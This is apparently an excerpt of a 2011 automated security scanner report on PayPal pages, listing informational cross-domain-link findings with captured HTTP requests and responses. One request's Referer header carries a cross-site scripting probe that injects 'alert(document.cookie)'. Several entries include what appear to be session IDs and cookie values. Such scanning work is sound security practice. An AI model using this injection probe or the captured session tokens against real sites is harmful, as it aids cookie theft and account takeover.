Set-Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=GkEYwVsjZZhUzxaRFwA2TLnMGm6DDuco5WzyiuycJwdtCTXVMPcQOIbKMoXC6NjLbdaub0kMRhEJS_lTlHkaGjzr77m4GvkIBUfCwRgc2Z3N3ZpuHynzHCszD9O2Vhi1zVVpXG%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c1313160187; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 14:43:07 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%2037%20xpt%2fMarketing%2fgeneral%2fSiteMap-outside%20b%2016%20_sitewide-search%20c%206%20webscr%20d%209%20searchscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2037%20xpt%2fMarketing%2fgeneral%2fSiteMap-outside%20j%2042%20xpt%2fCustomer%2fgeneral%2fSearchResultsRedesign%20k%2017%20Site%20Map%20-%20PayPal%20l%2023%20Search%20Results%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 34891

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/paypal.css">

<link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"><style type="text/css" id="antiClickjack">
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal-shopping.com/shop-stores.html">Shops that accept PayPal</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal-shopping.com/">Great shopping deals with PayPal</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal-media.com/aboutus.cfm">About PayPal</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal-media.com/awards.cfm">PayPal awards</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal-media.com/events.cfm">PayPal events</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal-media.com/management.cfm">Executive team</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal-media.com/inthenews.cfm">PayPal in the news</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal-media.com/mediacenter.cfm">Media Center</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal-media.com/releases.cfm">Press releases</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal-media.com/state_licenses.cfm">State licenses</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal-media.com/contactus.cfm">Media inquiries</a>
...[SNIP]...
<li><a target="_blank" href="https://www.thepaypalblog.com/">PayPal blog</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal-marketing.com/emarketing/partner/portal/landing.page">PayPal Partner Program</a>
...[SNIP]...
<li><a target="_blank" href="https://www.x.com">PayPal Developer Network</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal-community.com/">PayPal Community Help Forum</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal.at">PayPal Austria</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal.be">PayPal Belgium</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal.ca">PayPal Canada</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal.fr">PayPal France</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal.de">PayPal Germany</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal.it">PayPal Italy</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal.jp">PayPal Japan</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal.nl">PayPal Netherlands</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal.pl">PayPal Poland</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal.es">PayPal Spain</a>
...[SNIP]...
<li><a target="_blank" href="https://www.paypal.ch">PayPal Switzerland</a>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.23. https://www.paypal.com/us/cgi-bin/marketingweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/marketingweb

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/us/cgi-bin/marketingweb?cmd=_home

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecuritP1_750x70.gif
https://www.paypal-labs.com/
https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/ConsumerRevamp.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/core.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/marketing/marketing.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/en_US/Marketing/i/scr/scr_cpr_graydots_547x1.gif
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.paypalobjects.com/js/tns/min/bid.js
https://www.x.com/

Request

GET /us/cgi-bin/marketingweb?cmd=_home HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:25 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=HTWyqqr-HLb-Wsjq9R9pnHkZJpG0FU95IAOmS5LNpOH4zXNDS1POHVSOTy8r2IQSjBa6krvSz0DAKL5XcGRB2dyNW31BPdzzegbjKgYKzvpb3d9y9iq4ag3KugN6kzDfgeXgQm%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156905; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:48:26 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%205%20_home%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2045%20xpt%2fMarketing_CommandDriven%2fhomepage%2fMainHome%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2063%20Send%20Money%2c%20Pay%20Online%20or%20Set%20Up%20a%20Merchant%20Account%20with%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24877

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="all" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/core.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/marketing/marketing.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/ConsumerRevamp.css">

<link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"><style type="text/css" id="antiClickjack">
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"></head>
...[SNIP]...
f=https://www.paypal.com/us/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=49775&bn=AjYsXGN6DA8XUCUfQBA&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEZUYQhnRXNWYlRFUw><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg' border='0' alt=''/></a>
...[SNIP]...
</div><img src="https://www.paypalobjects.com/en_US/Marketing/i/scr/scr_cpr_graydots_547x1.gif" border="0" class="dottedline" alt=""><p class="acceptCredit">
...[SNIP]...
f=https://www.paypal.com/us/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=49777&bn=AjYsXGN6DA8XUCUfQBA&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEZUYQhnRXNWYlRFUQ><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecuritP1_750x70.gif' border='0' alt=''/></a>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
<a target="_blank" href="https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/Customer/popup/SecurityKeyVIP-outside" onClick="PAYPAL.core.openWindow(event, {width: 425, height: 350})"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif" alt=""></a>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.24. https://www.paypal.com/us/cgi-bin/searchscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/searchscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search&SESSION=4UAE7cJx7FDT9aWE8iaQdX1WLgO1TKkcr8pShIIQXF0D098vCpHiEl6YT9q

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://www.paypal-labs.com/
https://www.x.com/

Request

Response

7.25. https://www.paypal.com/us/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/webscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/us/cgi-bin/webscr?cmd=_display-xborder-fees-outside&countries=

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://www.paypal-labs.com/
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/paypal.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/flowCambio.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/en_US/i/btn/btn_fxnH_signUpNow_115x21.gif
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.paypalobjects.com/en_US/i/scr/pixel.gif
https://www.x.com/

Request

GET /us/cgi-bin/webscr?cmd=_display-xborder-fees-outside&countries= HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:11 GMT
Server: Apache
Set-Cookie: navcmd=_display-xborder-fees-outside; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:48:12 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%2029%20_display-xborder-fees-outside%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2026%20p%2fgen%2ffees-xborder-outside%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2038%20PayPal%20Fees%20for%20International%20Payments%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29956

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/paypal.css">

<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/flowCambio.css"><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"><style type="text/css" id="antiClickjack">
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script>
...[SNIP]...
<td><img alt="" border="0" height="1" width="150" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif"></td><td rowspan="3" width="21"><img height="1" width="21" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" border="0" alt=""></td><td><img alt="" border="0" height="1" width="560" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif"></td>
...[SNIP]...
<a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_pro-nonpro-welcome"><img height="21" width="112" src="https://www.paypalobjects.com/en_US/i/btn/btn_fxnH_signUpNow_115x21.gif" border="0" alt=""></a>
...[SNIP]...
<td><img alt="" border="0" height="2" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
...[SNIP]...
<td><img alt="" border="0" height="4" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.26. https://www.paypal.com/us/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/webscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/ua/ua_pop-outside&country.x=US

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/paypal.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/popup.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/ua.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png

Request

GET /us/cgi-bin/webscr?cmd=p/gen/ua/ua_pop-outside&country.x=US HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:11 GMT
Server: Apache
Set-Cookie: navcmd=p%2fgen%2fua%2fua_pop-outside; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:48:12 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%2023%20p%2fgen%2fua%2fua_pop-outside%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2023%20p%2fgen%2fua%2fua_pop-outside%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2023%20User%20Agreement%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5832

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/paypal.css">

<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/popup.css"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/ua.css"><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"><style type="text/css" id="antiClickjack">
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.27. https://www.paypal.com/us/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/webscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&SESSION=XbXubGedWJ4U7Znb8GSoKUyPDl-WoYZbW3BHESKTcAT5OSCVz1BOP2tJODS&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://www.paypalobjects.com/WEBSCR-640-20110722-1/Merchant/js/flowGettingStarted.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/global.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/print.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/onlineOpinionPopup.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/en_US/i/icon/icon_US_22x14.gif
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.paypalobjects.com/en_US/i/scr/pixel.gif

Request

GET /us/cgi-bin/webscr?cmd=_flow&SESSION=XbXubGedWJ4U7Znb8GSoKUyPDl-WoYZbW3BHESKTcAT5OSCVz1BOP2tJODS&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75 HTTP/1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/webapps/mpp/merchant?cb963%22-alert(document.cookie)-%22c89faa687fb=1
Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=OGXUOFHbwQ9WE3sALZ1qIFid-EZw9v8a_qL0LLVFCQKL5SI2sHzGcjrqppn1hBQoGV8q5Xx7qjDOH9OJ; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.198.1313112159974960; cwrClyrK4LoCV1fydGbAxiNL6iG=%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c; s_sess=%20v20%3Dxss%3B%20s_cc%3Dtrue%3B%20tr_p1%3Dcore%2520four%2520pane%3B%20s_ppv%3D86%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3Dcore%2520four%2520pane%255E%255ECreate%2520a%2520Business%2520Account%255E%255Ecore%2520four%2520pane%2520%257C%2520Create%2520a%2520Business%2520Account%255E%255E%3B%20s_sq%3Dpaypalglobal%253D%252526pid%25253Dcore%25252520four%25252520pane%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.paypal.com%2525252Fus%2525252Fcgi-bin%2525252F%2525253Fcmd%2525253D_pro-nonpro-welcome%252526ot%25253DA%3B; s_pers=%20gpv_c43%3Dcore%2520four%2520pane%7C1313162940186%3B%20gpv_events%3Dno%2520value%7C1313162941622%3B; navcmd=_pro-nonpro-welcome; cwrClyrK4LoCV1fydGbAxiNL6iG=MLQqxuwrfNB4GCgi5Tc5nJR8jQoFWYGnrVmOftTlbwLloOZ8AWj2pVAjVw2e_bZWPiiWgINZlRwMRCbOjtKn9n894IGC1O3m73c9x6j45AugHBvkMZ0i63Io-yJukjjq4BkaMm%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c1313160185; SPARTAJSESSIONID=b06ee16a91333; LANG=en_US%3BUS; analytics=CKeARvOya9OWJDVyrX9LvkWswAVYeWxwPyN-.DSCPeZ2ADt8p9zRetf0dzbeiMh07BSmxNe8tAZL4MlLG3fn.DLRhnce19-yE6Ssc7YyvKpgnYCRVainDwu5zp.3ddUZBwXvO49Skf8; cookie_welcome=welcome; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=jQo7sydPuuBqzheXyjgXVZ0Sh79IlbRwsmMUyXTbpOm18ra89H1dlxMiD9wWaJVbYK4n1G2NkBX1axYq69u0gtRb7aicBx2oogcN3p1x8rmWNJUt2wFa1qiTLrr7bnc6IDW2z7Nh7k4RT13aDBtSuUqLLbeEL_3BR2aDYd-kJOrGV1zE52mDN_BdlUvEoCd17m0j4NVDy1OF77TlROadlfAjNggeJAIspjLmn6KMh__vMNcMAiOv8BZMbsRZuzgT72_8qVkPqt2ql--OZsxgGY2o_3xkGtkBtYqPvsq-xh_aprULej602LIQU7DVZ2D40ce3LTL0aQpRgaKTxc1IgOsxT2ZGgV_Y0YYbwZShFNy4ys52

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:58:19 GMT
Server: Apache
